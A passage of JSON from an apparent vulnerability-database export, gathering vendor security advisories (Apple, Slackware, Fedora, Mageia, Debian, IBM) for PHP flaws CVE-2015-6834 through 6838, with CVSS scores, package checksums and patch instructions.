windows.\r\nCVE-ID\r\nCVE-2015-5943\r\n\r\nInstallation note:\r\n\r\nOS X El Capitan v10.11.1 includes the security content of\r\nSafari 9.0.1: https://support.apple.com/kb/HT205377\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-10-25T00:00:00", "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", "CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2015-10-25T00:00:00", "id": "SECURITYVULNS:DOC:32566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32566", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:03:07", "description": "Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2015-10-25T00:00:00", "title": "Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-5927", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-6975", "CVE-2015-3415", "CVE-2015-7035", "CVE-2015-3330", "CVE-2015-6987", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-7003", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5924", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-5874", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-5860", "CVE-2015-1855", "CVE-2015-7020", "CVE-2014-3618", "CVE-2015-6994", "CVE-2015-1352", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-2301", "CVE-2015-7021", "CVE-2015-6977", "CVE-2015-5868", "CVE-2014-3565", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5873", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-5912", "CVE-2015-6985", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5935", "CVE-2015-5722", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5937", "CVE-2015-5878", "CVE-2015-5855", "CVE-2015-7023", "CVE-2014-8611", "CVE-2015-6993", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-6836", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5936", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-6989", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-6990", "CVE-2015-3414", "CVE-2015-7009", "CVE-2014-9652", "CVE-2015-7031", "CVE-2015-6988", "CVE-2015-5523", "CVE-2015-5986", "CVE-2015-5943", "CVE-2015-5885", "CVE-2015-6996", "CVE-2015-6837", "CVE-2013-3951", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5524", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-0287", "CVE-2015-6974", "CVE-2015-5853", "CVE-2015-6835", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5914", "CVE-2015-5926", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14702", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2021-07-28T14:46:42", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.45-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.45-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.45-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.45-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.45-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.13-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.13-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nfd9eae8306c09b0312682cff0eb14bb9 php-5.4.45-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n275219372b3b99ceb5a550ea4470942a php-5.4.45-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd14ce9b2a21578596ad1db1f645be3cc php-5.4.45-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n268e075dfd094f0ea3713766278db863 php-5.4.45-x86_64-1_slack14.1.txz\n\nSlackware -current package:\na8738293cf3e540aba18df07d0bcb49b n/php-5.6.13-i586-1.txz\n\nSlackware x86_64 -current package:\na437ac05a81ab12a2abab95736f052e0 n/php-5.6.13-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.45-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-01T21:35:28", "type": "slackware", "title": "[slackware-security] php", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-01T21:35:28", "id": "SSA-2015-274-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.399477", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-14T23:22:46", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: php-5.6.13-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-14T23:22:46", "id": "FEDORA:90BE461976AB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NBWG3JAOKH4MJSW7CHVCRS7FZYVXXGMV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-14T22:23:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: php-5.6.13-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-14T22:23:26", "id": "FEDORA:F0C5861361B0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KIUXUYW7RJYZM3IKRZCQ526SCM3KUQBZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-18T19:33:49", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: php-5.6.13-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-18T19:33:49", "id": "FEDORA:02C1260F4011", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/64U4CM7WKXFYHBDMHJ7P5WQ3PYKUHSW2/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated php packages fix security vulnerabilities: The php package has been updated to version 5.5.29, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-13T21:58:30", "type": "mageia", "title": "Updated php packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T21:58:30", "id": "MGASA-2015-0365", "href": "https://advisories.mageia.org/MGASA-2015-0365.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:26:43", "description": "\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\n\n* [\\\nhttps://php.net/ChangeLog-5.php#5.4.45](https://php.net/ChangeLog-5.php#5.4.45)\n* [\\\nhttps://php.net/ChangeLog-5.php#5.6.13](https://php.net/ChangeLog-5.php#5.6.13)\n\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-13T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-07-21T05:48:48", "id": "OSV:DSA-3358-1", "href": "https://osv.dev/vulnerability/DSA-3358-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:14:00", "description": "\n* [CVE-2015-6831](https://security-tracker.debian.org/tracker/CVE-2015-6831)\nUse after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code remotely.\n* [CVE-2015-6832](https://security-tracker.debian.org/tracker/CVE-2015-6832)\nDangling pointer in the unserialization of ArrayObject items.\n* [CVE-2015-6833](https://security-tracker.debian.org/tracker/CVE-2015-6833)\nFiles extracted from archive may be placed outside of destination\n directory\n* [CVE-2015-6834](https://security-tracker.debian.org/tracker/CVE-2015-6834)\nUse after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code remotely.\n* [CVE-2015-6836](https://security-tracker.debian.org/tracker/CVE-2015-6836)\nA type confusion occurs within SOAP serialize\\_function\\_call due\n to an insufficient validation of the headers field.\n In the SoapClient's \\_\\_call method, the verify\\_soap\\_headers\\_array\n check is applied only to headers retrieved from\n zend\\_parse\\_parameters; problem is that a few lines later,\n soap\\_headers could be updated or even replaced with values from\n the \\_\\_default\\_headers object fields.\n* [CVE-2015-6837](https://security-tracker.debian.org/tracker/CVE-2015-6837)\nThe XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call is able to return\n NULL pointer and php does not check that.\n* [CVE-2015-6838](https://security-tracker.debian.org/tracker/CVE-2015-6838)\nThe XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call is able to return\n NULL pointer and php does not check that.\n* [CVE-2015-7803](https://security-tracker.debian.org/tracker/CVE-2015-7803)\nA NULL pointer dereference flaw was found in the way PHP's Phar\n extension parsed Phar archives. A specially crafted archive could\n cause PHP to crash.\n* [CVE-2015-7804](https://security-tracker.debian.org/tracker/CVE-2015-7804)\nAn uninitialized pointer use flaw was found in the\n phar\\_make\\_dirstream() function of PHP's Phar extension.\n A specially crafted phar file in the ZIP format with a directory\n entry with a file name \"/ZIP\" could cause a PHP application\n function to crash.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-08T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2022-07-21T05:54:17", "id": "OSV:DLA-341-1", "href": "https://osv.dev/vulnerability/DLA-341-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2022-06-28T21:59:13", "description": "## Summary\n\nMultiple security vulnerabilities have been discovered in php5 that is embedded in the IBM FSM. This bulletin addresses these vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-6836_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a type confusion error in the SOAP serialize_function_call() function. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106365_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106365>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2015-6837_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a NULL pointer dereference error. By sending specially crafted XSLT data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106366_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106366>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2015-6838_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a NULL pointer dereference error. By sending specially crafted XSLT data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106367_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106367>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.x \nFlex System Manager 1.3.3.x \nFlex System Manager 1.3.2.x \nFlex System Manager 1.3.1.x \nFlex System Manager 1.3.0.x \nFlex System Manager 1.2.x.x \nFlex System Manager 1.1.x.x\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. \n \n\n\nProduct | \n\nVRMF | \n\nAPAR | \n\nRemediation \n---|---|---|--- \nFlex System Manager| \n\n1.3.4.x | \n\nIT14622\n\n| Install [fsmfix_1.3.4.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.3.x | \n\nIT14622\n\n| Install [fsmfix_1.3.3.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.2.x | \n\nIT14622\n\n| Install [fsmfix_1.3.2.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.1.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.3.0.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.2.x.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.1.x.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n25 April 2016 : Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE 